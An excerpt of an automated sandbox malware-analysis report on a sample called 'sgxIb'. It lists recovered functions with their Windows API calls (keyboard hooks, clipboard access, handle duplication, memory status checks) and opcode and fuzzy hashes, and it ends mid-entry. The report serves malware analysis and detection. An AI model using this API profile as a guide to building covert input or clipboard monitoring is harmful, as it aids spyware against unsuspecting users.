                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: 8e82a6c1fe57cd43671dbdafab7a5fdf29bc72a219c3c736c729fad61784271c
                                        • Instruction ID: f73fb1bd68551d71c48fe251fed38fc9c03bf1d1fd52bc2ec0160c052f3ba8c6
                                        • Opcode Fuzzy Hash: 8e82a6c1fe57cd43671dbdafab7a5fdf29bc72a219c3c736c729fad61784271c
                                        • Instruction Fuzzy Hash: 643132B4D05289EFDB24CFA9C984BCEBBF1AF48314F208419E004BB294D7B46885CB55
                                        Function 071AB160 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Clipboard
                                        • String ID:
                                        • API String ID: 220874293-0
                                        • Opcode ID: cbc6e5f3627f0b4ed0c4b8d348e0fe5237441513aeb1e8c8cba210d8d2ca0804
                                        • Instruction ID: f37fac975699da02426c441ae44fb19b126833d60a691115f7a4e66fafdd0d6d
                                        • Opcode Fuzzy Hash: cbc6e5f3627f0b4ed0c4b8d348e0fe5237441513aeb1e8c8cba210d8d2ca0804
                                        • Instruction Fuzzy Hash: BD3132B4D05348EFDB24CFA9C984BCDBBF5AF08304F208019E404BB294D7B4A884CB95
                                        Function 071A9B90 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 071A9C1F
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 8aa6445e069f458a93d376c85df3363821cc9dbb439562fc0c905b4bf4b99377
                                        • Instruction ID: f34418cc13c59de40cf77f340e1931295df34979df4eca83a4225b32ee24b30e
                                        • Opcode Fuzzy Hash: 8aa6445e069f458a93d376c85df3363821cc9dbb439562fc0c905b4bf4b99377
                                        • Instruction Fuzzy Hash: 082116B5900259AFDB10CFA9D584ADEFFF4EB48310F14845AE958A7350D374A940CFA5
                                        Function 071A9B98 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 071A9C1F
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 183ecb4832ae5904a6b6e350bea5ec18a452122b7b238e7c21cbae354a776131
                                        • Instruction ID: 138fc2e5b68d601772d60205c108ed7016726c74423d0198978b62b22a6bc650
                                        • Opcode Fuzzy Hash: 183ecb4832ae5904a6b6e350bea5ec18a452122b7b238e7c21cbae354a776131
                                        • Instruction Fuzzy Hash: 3321E4B5900259AFDB10CFAAD584ADEFBF8EB48310F14841AE918A7350D374A940CFA4
                                        Function 071A9788 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,071AAD35), ref: 071AADBF
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 34786221b67ab9627a03e19ce08bdcc8d68bfb52420caee87f737bfcb4ae0f3a
                                        • Instruction ID: 947b08bc58338d662fa6b42da3d6c67c98f873fb35a4b1f9c56293e0d9a542bc
                                        • Opcode Fuzzy Hash: 34786221b67ab9627a03e19ce08bdcc8d68bfb52420caee87f737bfcb4ae0f3a
                                        • Instruction Fuzzy Hash: 3121CAB5805398CFCB10DFA9D4447DEBFF4EF49320F14809AD494A7251C374A944CBA8
                                        Function 071AD2A8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 071AD32B
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: 95badc89e6b47657c7a288c6d98a9ebabb9e92f9c7bdf17d558229db08b56ceb
                                        • Instruction ID: 70d405bc760dbc2cdbee1b0afeb8adacee8d8fe02d43a322e713d75f3b9bfe38
                                        • Opcode Fuzzy Hash: 95badc89e6b47657c7a288c6d98a9ebabb9e92f9c7bdf17d558229db08b56ceb
                                        • Instruction Fuzzy Hash: A32135B5D002099FCB14CF9AD944BDEFBF4BF88320F108429E459A7250C774A940CFA5
                                        Function 071AD2B0 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 071AD32B
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: f0393c6de12a1a5d00ed388d1cc4822545350624f14c100c545844abf062efc9
                                        • Instruction ID: bad31c7cdba80a506c5ac97714ce49450b2c076408170aad0bbdf136e6b85fec
                                        • Opcode Fuzzy Hash: f0393c6de12a1a5d00ed388d1cc4822545350624f14c100c545844abf062efc9
                                        • Instruction Fuzzy Hash: 892124B5D002199FCB14CF9AD944BEEFBF5AF88320F10842AD459A7290C774A944CFA5
                                        Function 032CEE58 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 032CEEBF
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4162490899.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_32c0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 6f939e8cab27c5fab5bdef834e6dfb928979ef93015586d48ea9745f53cbadff
                                        • Instruction ID: aefe1b96bbe62c8fd5219f9e335a24509430560532f8c953da918ab33b746559
                                        • Opcode Fuzzy Hash: 6f939e8cab27c5fab5bdef834e6dfb928979ef93015586d48ea9745f53cbadff
                                        • Instruction Fuzzy Hash: 3111F3B2C1066A9BCB10DF9AC544BDEFBF4AF48320F15816AD818B7250D378A944CFE5
                                        Function 071A4BEA Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 071A4C56
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 748f9946087355b91e0c6d6cbdc395e53466cc60e8feb32835e42ac781688e9c
                                        • Instruction ID: d17a1ab00fc6cb0875c0085499140acae22ea2cc52a50ae01902ff22f1de4182
                                        • Opcode Fuzzy Hash: 748f9946087355b91e0c6d6cbdc395e53466cc60e8feb32835e42ac781688e9c
                                        • Instruction Fuzzy Hash: 871112B58002499FCB10CFAAC544ADEFBF4EF48310F10841AD868A7204D374A545CFA5
                                        Function 071A3714 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 071A4C56
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 2693e607df1fe1eca5c20f02d36b1eb3adeadecbeb3eefc0e1716f02e65e5d99
                                        • Instruction ID: 95dcd4d6bd77968e9910da5f7b0f73907a17c42121dd69b724e6326dbe65563e
                                        • Opcode Fuzzy Hash: 2693e607df1fe1eca5c20f02d36b1eb3adeadecbeb3eefc0e1716f02e65e5d99
                                        • Instruction Fuzzy Hash: C21120B9C003499BCB10CF9AC444ADEFBF4AB88210F10842AD829B7250C3B5A645CFA5
                                        Function 071AB621 Relevance: 1.6, APIs: 1, Instructions: 50comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 071AB67D
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: ec7c5136f496d28de7c3e4a36b5aeb560a88dfd501ddb18f6815b0279b92abda
                                        • Instruction ID: d59e171a8be7142bf17c71eee557b5f4c8481386ea63f4eb92031503c4150259
                                        • Opcode Fuzzy Hash: ec7c5136f496d28de7c3e4a36b5aeb560a88dfd501ddb18f6815b0279b92abda
                                        • Instruction Fuzzy Hash: 021155B58043899FCB20DFAAD448BDEFFF4EB48320F148469D458A7210C375A580CFA5
                                        Function 071AB03F Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 071AB67D
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: fd6ace014df095a42b87e1fc0750fc04992a1b0f3aa40a2352b0b643bac1b165
                                        • Instruction ID: 51280831378f92584d84995356b1235e545add0d725f71f3fa5684bb76b84570
                                        • Opcode Fuzzy Hash: fd6ace014df095a42b87e1fc0750fc04992a1b0f3aa40a2352b0b643bac1b165
                                        • Instruction Fuzzy Hash: 051133B58103499FCB20DF9AD549BDEBBF8EB48320F20841AD558A7350D375A944CFA5
                                        Function 071AAD58 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,071AAD35), ref: 071AADBF
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 4aa6e9c5031530a724e2a929ec7bbb0458f29bf492a3d6ec2dac48284296882a
                                        • Instruction ID: d564aa2cd99115dd19dfd978452f9a25e3044547a496381dd56b51f21f3c3f1a
                                        • Opcode Fuzzy Hash: 4aa6e9c5031530a724e2a929ec7bbb0458f29bf492a3d6ec2dac48284296882a
                                        • Instruction Fuzzy Hash: 311133B5800259CFCB20CF9AD448BDEBFF4EB48324F20845AD558B7650C775A944CFA5
                                        Function 071A97A4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,071AAD35), ref: 071AADBF
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 2d6389985ea62caac3cd9edde163c81294bbf800722a2e9379b76ae6b955f169
                                        • Instruction ID: ec4b7ae7caddad5955c24249474479b389c97cede556a2368b110e682051218c
                                        • Opcode Fuzzy Hash: 2d6389985ea62caac3cd9edde163c81294bbf800722a2e9379b76ae6b955f169
                                        • Instruction Fuzzy Hash: 881133B5800359DFCB20DF9AC544BDEBBF8EB48320F208419E558B7240C374A944CFA4
                                        Function 071AB048 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 071AB67D
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4194879620.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71a0000_sgxIb.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        • Opcode ID: 2624f7690b16cac2e4cf27f9df80aaff57c0b591dfea30d750c3857c990ccfe7
                                        • Instruction ID: 67c35f1d7ba35286a8375bb07ac1cc7b51c99005060393d1a38731e035c3ae49
                                        • Opcode Fuzzy Hash: 2624f7690b16cac2e4cf27f9df80aaff57c0b591dfea30d750c3857c990ccfe7
                                        • Instruction Fuzzy Hash: 3B1130B58043489FCB20DF9AD588BDEBBF8EB48320F208419D518A7250D374A940CFA8
                                        Function 071B6308 Relevance: .2, Instructions: 229COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4195241370.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71b0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9c91334cda6d33473c35e1e4b763204cbd3cddbe828b829d09c2d532a0d2dd8
                                        • Instruction ID: ab737dc7cf456fe4294426b645c420753ed2408f3b689784899645d360d002c8
                                        • Opcode Fuzzy Hash: d9c91334cda6d33473c35e1e4b763204cbd3cddbe828b829d09c2d532a0d2dd8
                                        • Instruction Fuzzy Hash: AD61C4B1F001124FCB259A7EC8845AFBAD7AFD5620B25443AD80EDB364DF65ED0287D2
                                        Function 068F2139 Relevance: .1, Instructions: 117COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18b8260277487e71113213d060f75a889db5b75d9ee87a2e85430f3c26eb965
                                        • Instruction ID: 4f9b1b1a24550e46142116e0f7ac8efa138e66fd9c04aed78a3d51e18010b0e9
                                        • Opcode Fuzzy Hash: b18b8260277487e71113213d060f75a889db5b75d9ee87a2e85430f3c26eb965
                                        • Instruction Fuzzy Hash: E5417030D207099FCB14DFA9C85469DFBB1FF88300F14C659D545BB254EB71AA85CB91
                                        Function 068F0C30 Relevance: .1, Instructions: 85COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9504141e65688eb4656c23759fd88f1e4286cfccd6ce79ed89dca805db436b70
                                        • Instruction ID: fa09bd77e334770dd1d288e12f9ac53dc1a2aea91adeab2d76928d8a7f4b4816
                                        • Opcode Fuzzy Hash: 9504141e65688eb4656c23759fd88f1e4286cfccd6ce79ed89dca805db436b70
                                        • Instruction Fuzzy Hash: 43314B70A10606DFD754CF6AC588A6EFBF2EF88710B14C969D659D7714E730E841CB90
                                        Function 068F1B3A Relevance: .1, Instructions: 83COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ff966453001fd8b999c42c0e9c4be4f8dccd3df8e6ef2a8b2b41ab7ca480d1da
                                        • Instruction ID: d28b17637b6f140049b7f1ef4f448874041c354d6456a66a844aa7feeba0ecca
                                        • Opcode Fuzzy Hash: ff966453001fd8b999c42c0e9c4be4f8dccd3df8e6ef2a8b2b41ab7ca480d1da
                                        • Instruction Fuzzy Hash: 21315270A11A05DFC754CF2AC548A6EB7F2BF88710B14896CD699D7714E730E842CB90
                                        Function 068F2990 Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84d56eb215b86a42747bf20304b2d7de380c884b3d9df861abe2b561806f7f6a
                                        • Instruction ID: 36d77b3c260e038d919bf06240c46ef719b03195731a7b57a9665634aceaad49
                                        • Opcode Fuzzy Hash: 84d56eb215b86a42747bf20304b2d7de380c884b3d9df861abe2b561806f7f6a
                                        • Instruction Fuzzy Hash: 9321D134700206CFCB15EB78D854A6F7BAAEF88300F208469D509E73A5DB359D42CB92
                                        Function 068F24BC Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8bd2845f6c10163da9c8bff79357955f6f7de4faace86320f11086534e13444
                                        • Instruction ID: 8cef3cddadaeff1aa21bbf09d239bd9cdcf4f2286c35a447d9af0cfc07899a26
                                        • Opcode Fuzzy Hash: c8bd2845f6c10163da9c8bff79357955f6f7de4faace86320f11086534e13444
                                        • Instruction Fuzzy Hash: 283111B0D11218DFDB60CFA9C9A4B8EBBF4AF48314F24805AE544AB344C7B49985CFA4
                                        Function 068F29A0 Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf3b6e957930596b539a1799225e7c5db7f4f1883efa525430338a3ef5db95a9
                                        • Instruction ID: 031e197d0e9c9573547e4c5256d99da3deba7ba91ee4b677a74fa1ba1a6580e4
                                        • Opcode Fuzzy Hash: cf3b6e957930596b539a1799225e7c5db7f4f1883efa525430338a3ef5db95a9
                                        • Instruction Fuzzy Hash: 76217F74710206DFCB54EB78D954B7F77AEEB88710F208429D509E3394DA36DD418792
                                        Function 0177D030 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4158167785.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_177d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 60b1f9306193fb22886fc3f367c36672ec1c8d805d86d667bc9f87cd8b1c6e49
                                        • Instruction ID: 476e197fe6c89a0d2894ed316281949842618cc4747cb8ebf36ec350285dbf7c
                                        • Opcode Fuzzy Hash: 60b1f9306193fb22886fc3f367c36672ec1c8d805d86d667bc9f87cd8b1c6e49
                                        • Instruction Fuzzy Hash: E4212271604204DFCF22DF58D9C4B26FBA5FF84314F24C5ADD80A4B256C33AD446CA62
                                        Function 0177D1F8 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4158167785.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_177d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 611172a2bb7f2794d9b908121379a02f7a91b619188e7cc71887ac11cc4d160c
                                        • Instruction ID: 1d995e6513457f4350c0675bde84db77ac2ee740047f16a890e05a24ca172541
                                        • Opcode Fuzzy Hash: 611172a2bb7f2794d9b908121379a02f7a91b619188e7cc71887ac11cc4d160c
                                        • Instruction Fuzzy Hash: 952126B1508200DFDF21DF98D984B2AFB65FF84334F24C569E9494B246C376D447CAA1
                                        Function 0177D3A8 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4158167785.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_177d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2c1fb2de18b0892d80a580af79cd36ab89edd746078a8479a9d1de50162381ee
                                        • Instruction ID: 41a0891ab74f7036f5a8b77d33c3b0123391a7670e77c7ba105e954a91cf5fab
                                        • Opcode Fuzzy Hash: 2c1fb2de18b0892d80a580af79cd36ab89edd746078a8479a9d1de50162381ee
                                        • Instruction Fuzzy Hash: 3F21F2B1604204DFDF15DF58D9C4B26FBA5EF88314F20C5ADED0A4B256C376E846CA61
                                        Function 068F1E44 Relevance: .1, Instructions: 71COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e4729196e2d5b3dfba23f24f1c4734f3d0ba28a129612bf5306581a30b779c47
                                        • Instruction ID: c585a91c92105d77383607f816241d115ca13533d188445247ccc0f8cbf063b3
                                        • Opcode Fuzzy Hash: e4729196e2d5b3dfba23f24f1c4734f3d0ba28a129612bf5306581a30b779c47
                                        • Instruction Fuzzy Hash: F83102B0C11218DFDB60DFD9C5A9B8EBBF4AB08314F20801AE608BB354C3B49945CFA0
                                        Function 068F0770 Relevance: .1, Instructions: 67COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12c2a1e576630690a45c5b6065b9a9aa39a791f40dfe065e020c7679b820fadd
                                        • Instruction ID: e497d90bafe6873f10e8029c4c940c4156a06249df14a2edcc5e78cb844bdbd5
                                        • Opcode Fuzzy Hash: 12c2a1e576630690a45c5b6065b9a9aa39a791f40dfe065e020c7679b820fadd
                                        • Instruction Fuzzy Hash: C1119AB02013058FC356AF68D85855ABBA2FF85344B208A7DD25ACB755DB32DC0ACBA4
                                        Function 068F1988 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f4b47a86649c54c32472a543954c1b5ebaa5eb5a14450cbde5b8bd3ca176542
                                        • Instruction ID: 97b356963acf801fdbb37e8298d2ad432054497797794b7b8a900b71f222290a
                                        • Opcode Fuzzy Hash: 2f4b47a86649c54c32472a543954c1b5ebaa5eb5a14450cbde5b8bd3ca176542
                                        • Instruction Fuzzy Hash: 0D11C431605349DFCB128F68D8488D9BFF1FF4A310B0589E6E5D4DB262DB319855CBA1
                                        Function 071B4318 Relevance: .1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4195241370.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_71b0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ea2a1eb951d801679c3d0be05d008ea93d199002537ef87cbd2f21b0c33a1e9
                                        • Instruction ID: 3a205e2a8a6e5e3d16cf0734a4faa35e87fe1e7b954154ae1881470270f56030
                                        • Opcode Fuzzy Hash: 2ea2a1eb951d801679c3d0be05d008ea93d199002537ef87cbd2f21b0c33a1e9
                                        • Instruction Fuzzy Hash: 5011C0317001665FCB22966CD85076EB7EADFCA754F28842AE44DC73A2EA24DC468391
                                        Function 068F0780 Relevance: .1, Instructions: 58COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4190477887.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_68f0000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2a4c6ba04b03428523f97cc79a6882bd0d09064d2cc9f57dc5da85d40b9026d
                                        • Instruction ID: 6a34896ef28522c2c5c5c26a67c08f6939cb0c64ef67b940098da483a387b9d5
                                        • Opcode Fuzzy Hash: c2a4c6ba04b03428523f97cc79a6882bd0d09064d2cc9f57dc5da85d40b9026d
                                        • Instruction Fuzzy Hash: EF118CB07003058FC359AF69D85865AB7A7FB85354B20897CC21A8B754DF32DC09CBA4
                                        Function 0177D1F3 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000001C.00000002.4158167785.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_28_2_177d000_sgxIb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                        • Instruction ID: b52db0e9240987ec7885708b20621ab0b4cb2fe468c34f6645810c97a7ad51cf
                                        • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                        • Instruction Fuzzy Hash: CE119075508280DFDB12CF54D5C4B15FF61FB84324F24C6AAD8494B656C33AD40ACBA1
                                        Function 0177D3A3 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
